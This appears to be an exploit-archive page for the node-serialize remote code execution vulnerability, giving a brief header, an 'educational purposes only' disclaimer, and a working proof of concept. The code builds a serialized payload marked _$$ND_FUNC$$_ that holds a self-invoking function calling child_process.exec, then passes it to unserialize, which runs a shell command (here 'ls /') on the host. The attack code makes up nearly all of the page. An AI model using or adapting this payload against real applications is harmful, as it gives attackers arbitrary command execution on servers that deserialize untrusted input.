Node.js nodeserialize remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2017-02-08 | Type : remote | Platform : linux
This exploit / vulnerability Node.js nodeserialize remote code execution is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);